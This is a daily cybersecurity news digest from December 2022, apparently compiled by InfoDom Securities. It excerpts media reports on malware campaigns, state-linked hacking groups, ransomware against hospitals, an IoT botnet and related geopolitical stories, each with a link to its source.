Friday, December 09, 2022 // (IG): BB // Bubba3dPrints // Coffee for Bob
Researchers Uncover Darknet Service Allowing Hackers to Trojanize Legit Android Apps
FROM THE MEDIA: Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims. The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News. "This campaign resulted in thousands of victims," the Dutch cybersecurity company said, adding, "Erbium stealer successfully exfiltrated data from more then 1,300 victims."
READ THE STORY: THN
MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics
FROM THE MEDIA: The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity. "The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up. MuddyWater, also called Boggy Serpens, Cobalt Ulster, Earth Vetala, Mercury, Seedworm, Static Kitten, and TEMP.Zagros, is said to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).
READ THE STORY: THN
Persecution of Falun Gong Laid Groundwork for China’s Digital Totalitarianism
FROM THE MEDIA: Former Chinese leader Jiang Zemin recently passed away, leaving behind a legacy that includes ushering China into a modern surveillance state. “Jiang took critical steps in the early days of the internet in China to build the system today known as the Great Firewall, cutting off Chinese users from the rest of the world,” Sarah Cook, research director for China, Hong Kong, and Taiwan at Freedom House, wrote on Twitter after China’s state-run media announced Jiang’s death on Nov. 30.
READ THE STORY: The Epoch Times
Android app with over 5m downloads leaked user browsing history
FROM THE MEDIA: A browsing app for Android devices, Web Explorer – Fast Internet, left open its Firebase instance, exposing app and user data, the Cybernews research team has discovered. Firebase is a mobile application development platform that offers many features, including analytics, hosting, and real-time cloud storage. Web Explorer – Fast Internet is a browsing app with over five million downloads on the Google Play store. It boasts of increasing browsing speed by 30% and has a user rating average of 4.4 out of five stars, across more than 58,000 reviews.
READ THE STORY: Security Affairs
APT37 Uses Internet Explorer Zero-Day to Spread Malware
FROM THE MEDIA: North Korean threat group APT37 was able to exploit an Internet Explorer zero-day vulnerability to deploy documents loaded with malware as part of its ongoing campaign targeting users in South Korea, including defectors, journalists, and human rights groups. Google's Threat Analysis Group (TAG) found the zero-day flaw in the Internet Explorer JScript engine in late October, tracked under CVE-2022-41128, and now reports that Microsoft was responsive and has issued applicable patches.
READ THE STORY: DARKReading
CommonSpirit Health ransomware attack exposed data of 623,000 patients
FROM THE MEDIA: CommonSpirit Health has confirmed that threat actors accessed the personal data for 623,774 patients during an October ransomware attack. This figure was published today on the U.S. Department of Health breach portal, where healthcare organizations are legally obligated to report data breaches impacting over 500 individuals. At the start of October, the Illinois-based non-profit health system first informed the public of a cyberattack that took down its IT systems. CommonSpirit Health is the second largest health system in the United States, operating 140 hospitals and over 1,000 care sites across 21 states, so any disruption in its operation has widespread impact potential.
READ THE STORY: Bleeping Computer
U.S. extends three firms' export ban over China exports
FROM THE MEDIA: The U.S. Commerce Department will continue to deny three U.S.-based firms' export privileges, the government announced on Thursday, saying the companies had illegally exported satellite, rocket and defense technology to China. The extension came after new concerns about Quicksilver Manufacturing Inc, Rapid Cut LLC and U.S. Prototype Inc, which the Commerce Department said in a June 7 order had sent technical drawings and blueprints from U.S. customers to manufacturers in China to 3-D print satellite, rocket and defense-related prototypes without authorization.
READ THE STORY: Reuters
US Health Dept warns of Royal Ransomware targeting healthcare
FROM THE MEDIA: The U.S. Department of Health and Human Services (HHS) issued a new warning today for the country's healthcare organizations regarding ongoing attacks from a relatively new operation, the Royal ransomware gang. The Health Sector Cybersecurity Coordination Center (HC3) —HHS' security team— revealed in a new analyst note published Wednesday that the ransomware group has been behind multiple attacks against U.S. healthcare orgs. "Since its appearance, HC3 is aware of attacks against the Healthcare and Public Healthcare (HPH) sector," the advisory says.
READ THE STORY: Bleeping Computer
Iranian APT Agrius Targets Diamond Industry Worldwide With Fantasy Wiper
FROM THE MEDIA: An Iran-based advanced persistent threat (APT) group known as Agrius has conducted supply chain-focused attacks against the diamond industry (and others) across three continents. The claims come from security researchers at welivesecurity by ESET, who published an advisory about Agrius on Wednesday. In the technical write-up, ESET senior threat intelligence analyst Adam Burgher said the team analyzed a supply chain attack targeted at an Israeli software developer to deploy Fantasy, Agrius’s new wiper. “The Fantasy wiper is built on the foundations of the previously reported Apostle wiper but does not attempt to masquerade as ransomware, as Apostle originally did,” Burgher explained.
READ THE STORY: InfoSecMag // SCMAG
Identification and Classification of Crypto-Malware Using ThreatMapper
FROM THE MEDIA: ThreatMapper, our open-source Cloud Native Application Protection Platform (CNAPP), now integrates natively with YaraHunter. YaraHunter is a powerful malware scanner for cloud-native – containers, images & hosts. In a previous post, we discussed scanning the cloud native assets for malware using YaraHunter – to identify and report possible indicators of malware across different cloud resources, pods, virtual machines, file systems, image registries, and build artifacts. In this post, we will discuss using ThreatMapper to classify various cloud-native malware, the enhancements to the Yara rulesets to identify crypto signature malware risks, and prioritize those risks using runtime context to build a better security posture.
READ THE STORY: Security Boulevard
REvil-hit Medibank to pull plug on IT, shore up defenses
FROM THE MEDIA: Australian health insurance company Medibank will take all of its IT systems offline and close its branches over the weekend as part of its ongoing efforts to improve security and recover from a massive data security breach in October. The planned outage, dubbed Operation Safeguard, begins at 2030 Sydney time on Friday, December 9. The insurer said it expects all systems to be back online by Sunday "at the latest." Microsoft's response team will show up at the insurer's Melbourne headquarters to help with the security overhaul.
READ THE STORY: The Register
Automated dark web markets sell corporate email accounts for $2
FROM THE MEDIA: Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks. Analysts at Israeli cyber-intelligence firm KELA have closely followed this trend, reporting at least 225,000 email accounts for sale on underground markets. The largest webmail shops are Xleet and Lufix, claiming to offer access to over 100k breached corporate email accounts, with prices ranging between $2 and $30, if not more, for highly-desirable organizations.
READ THE STORY: Bleeping Computer
‘Zombinder’ service allows cybercriminals to easily add malware to legitimate apps
FROM THE MEDIA: A newly discovered service on the dark web has been found to allow cybercriminals to easily add malware to legitimate apps. Detailed today by researchers at ThreatFabric B.V., “Zombinder” was discovered while researching several cases of threat actors using a form of Android banking malware known as Ermac. As the researchers dug further, they uncovered a campaign that employed several different types of malware targeting Android and Windows users, including Erbium, the Aurora stealer and Laplas “clipper.”
READ THE STORY: SiliconAngle
Google: How Android’s Private Compute Core protects your data
FROM THE MEDIA: Google has disclosed more technical details about how Private Compute Core (PCC) on Android works and keeps sensitive user data processed locally on protected devices. Introduced in Android 12, PCC is a secure, isolated, and trusted environment within the operating system where data from sensors, GPS, microphone, camera, and screen are stored and processed to offer machine learning features to the user. Examples of those intelligent features include 'Live Caption,' which uses the microphone for speech recognition, 'Now Playing,' which recognizes the song, or 'Smart Reply,' which suggests responses in messaging apps.
READ THE STORY: Bleeping Computer
Ukraine-Russia War: Putin Hedging on Cyberwarfare
FROM THE MEDIA: If there’s one thing we learned in this months-long run of the Ukraine-Russia war, it is that Russian troops are not only demoralized but have fallen short of expectations. Moreover, many of the factors of their loss could be attributed to poor military leadership compared to Ukraine’s highly streamlined directives from their generals. Nonetheless, Russia continues to attack Ukrainians in more ways than the battle on the borders. One way they’re doing that is by cyber warfare. Russia has been using highly sophisticated cyber-attacks to achieve its strategic objectives in Ukraine.
READ THE STORY: SOFREP
Novel Botnet Dubbed 'Zerobot' Targets Slew of IoT Devices
FROM THE MEDIA: A novel botnet is taking advantage of vulnerabilities in a slew of networking equipment and networked cameras with an emphasis on equipment manufactured in East Asia. Among the targeted devices are three types of Totolink-brand routers made by Hong Kong-based Zioncom and a variety of cameras made by China-based Hikvision. The botnet, dubbed Zerobot by cybersecurity firm Fortinet, also uses a vulnerability identified in thermal sensor cameras made by U.S.-based Teledyne FLIR.
READ THE STORY: BankInfoSec
North Korea using freelance techies to fund missiles and nukes
FROM THE MEDIA: North Korean IT pros are using freelancing platforms to earn money that the nation's authoritarian government uses to fund the development of missiles and nuclear weapons, according to South Korea's government. Seoul therefore wants gig platforms to impose stricter checks to restrict its enemy's activities. South Korea's intelligence services, national police, and five ministries yesterday published a warning about the North's (DPRK) tactics.
READ THE STORY: The Register
Elon Musk's brain chip company has killed so many animals that the USDA is investigating them
FROM THE MEDIA: Elon Musk can't stay out of the headlines. The Silicon Valley tycoon, already under fire for making a series of unpopular changes at Twitter after purchasing the company for a deal in which he admits he overpaid, is embroiled in a new controversy over Neuralink — a smaller company he founded with the express intent to develop implantable brain chips that can interact with computers. In the process of testing brain implants on animals, Neuralink has allegedly killed almost all of them. Now, Musk's medical device company is being investigated by the federal government for possible animal-welfare violations.
READ THE STORY: Salon
Overlooked Chinese Chip Maker’s Military-Industrial Ties Revealed
FROM THE MEDIA: A critical yet little-known chipmaker that supplies several big-name Chinese military companies is facing heightened scrutiny as a new report, expected today, will warn that Beijing wants to use the firm to increase foreign dependency on Chinese supply chains. Its release comes amid news that Congress this week watered down a bill to address that threat. Critical yet little-known chipmaker that supplies several big-name Chinese military companies is facing heightened scrutiny as a new report, expected today.
READ THE STORY: National Review
Metropolitan Opera dealing with cyberattack that shut down website, box office
FROM THE MEDIA: The Metropolitan Opera confirmed that it is dealing with a crippling cyberattack that has shut down their website and box office. The New York-based opera house said on Wednesday evening that the cyberattack impacted their network systems, including their “website, box office, and call center.” While all performances will continue as scheduled, the organization is unable to process new ticket orders or provide exchanges and refunds. “Once normal operations have resumed, we will honor all refunds and exchanges that we have been unable to process during this period,” the company said in a statement on Twitter.
READ THE STORY: The Record
South Korean authorities issue warning about disguised North Koreans getting IT jobs
FROM THE MEDIA: South Korean authorities issued an interagency advisory Thursday warning companies about hiring North Korean IT workers who disguise their true nationality and use their wages to help fund the country’s sanctioned nuclear weapons program. The advisory was published by several ministries, alongside South Korea’s National Police Agency and its National Intelligence Service, requesting “enhanced due diligence and more stringent identity verification process from domestic companies to avoid hiring or engaging in business contracts with [North Korean] IT workers who disguise their nationality and identities.”
READ THE STORY: The Record
US National Cyber Director plans Japan trip to bolster digital cooperation
FROM THE MEDIA: U.S. National Cyber Director Chris Inglis plans on traveling to Japan later this month to advise government officials there on bolstering cybersecurity defenses, according to a source briefed on the upcoming trip. The official visit appears to be an effort to improve cybersecurity cooperation with a key ally in Asia amid a strained relationship between the United States and China, according to two people who confirmed Inglis’ travel plans but asked not to be named because they are not authorized to speak to the press.
READ THE STORY: Cyberscoop
Google Ad Manager outage costs big websites ad sales
FROM THE MEDIA: A Google service relied upon by many large websites to sell and display ads was down for about three hours Thursday, denying major news publishers revenue during the crucial holiday period, two sources familiar with the matter said. "The issue with Google Ad Manager has been resolved and ad serving has now been restored for the affected users,” Google said in a tweet on Thursday evening. “We apologize for the inconvenience.”
READ THE STORY: Reuters
Killer robots have arrived to Ukrainian battlefields
FROM THE MEDIA: Amid Ukraine’s muddy trench warfare, grinding artillery bombardments and Soviet-era tank battles, a futuristic digital war is waged as the line between human and machine decision-making becomes ever thinner. Since Russia invaded Ukraine in February, AI-powered drones — both homemade and highly sophisticated — have been deployed on an unprecedented scale on the battlefield. Russia has reportedly used the Kalashnikov Kub and Lancet Kamikaze “highly autonomous” drones. Ukraine has relied on the Turkish Bayraktar TB2 that has autonomous flight capabilities and boasts “laser guided smart ammunition.”
READ THE STORY: .Coda
China's Reported Manipulation of Twitter Draws Lawmaker Questions
FROM THE MEDIA: Influential lawmakers on the House Intelligence Committee sent a letter to Twitter CEO Elon Musk on Tuesday expressing “deep concern” over reports that the People’s Republic of China—or PRC—orchestrated a manipulation campaign on the social media platform to obscure news about mass public demonstrations across the country. “We are gravely concerned about the potential impacts of the PRC’s growing cyber-enabled capabilities, including foreign malign influence operations, on U.S. national security interests both at home and abroad,” Committee Chairman Adam Schiff, D-Calif., and Reps. Raja Krishnamoorthi, D-Ill., and Jackie Speier, D-Calif., said in the Dec. 6-dated letter.
READ THE STORY: NextGov
Semiconductors, The Fourth Industrial Revolution and the End of Globalization
FROM THE MEDIA: Semiconductors are a key player in the Fourth Industrial Revolution as they are at the heart of so many inventions with potential to dramatically affect the production capabilities in many industries, including computing, healthcare, military systems, transportation, and clean energy. But, as only a handful of countries have the complex knowledge and capital capacity needed to produce them, their limited supply became a geopolitical thorn involving harsh trade wars and security risks.
READ THE STORY: Yahoo Finance
Rise of deep-fakes to spread misinformation for Ukraine – Russia crisis, possible spillovers, and impact
FROM THE MEDIA: Volodymyr Zelensky appeared in a video during the third week of the Ukraine crisis earlier this year, wearing a dark green shirt and speaking slowly and deliberately while standing behind a white presidential podium bearing his country’s coat of arms. The Ukrainian president’s body barely moved as he spoke, with the exception of his head. As he appeared to exhort Ukrainians to surrender to Russia, his voice sounded warped and almost gravelly. In the tape, which was instantly detected as a deep-fake, he appeared to say, in Ukrainian, “I ask you to lay down your weapons and go back to your families,” “This war is not worth dying for.
READ THE STORY: Modern Diplomacy
Items of interest
NDAA requires intelligence agencies to study creation of cyber collaboration program
FROM THE MEDIA: Key federal agencies in charge of intelligence and cybersecurity will be required by the upcoming National Defense Authorization Act (NDAA) bill to study how to build a new cyber information collaboration environment to enable government and industry to better mitigate malicious cyber activity. The leaders of the National Security Agency (NSA) and Cybersecurity & Infrastructure Security Agency (CISA) will be required by April 30, 2023, to conduct a study and brief relevant Armed Services Committees in Congress regarding how Department of Defense components and entities, such as the NSA, can support the development of a “cyber threat information collaboration environment program,” the NDAA 2023 bill stated.
READ THE STORY: Fedscoop
Stephan Gerling - Yacht Hacking from SatCOM to engine control - DEF CON 27 Hack the Sea Village (Video)
FROM THE MEDIA: Yacht Hacking from SatCOM.
Hack a Satellite [Hack-A-Sat] Contest | DEF CON 29 (Video)
FROM THE MEDIA: Hacking a Satellite is beyond standard application and web security. When I stumbled across Hack-A-Sat at DEF CON 29, I had to stop and hear about what it was all about.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com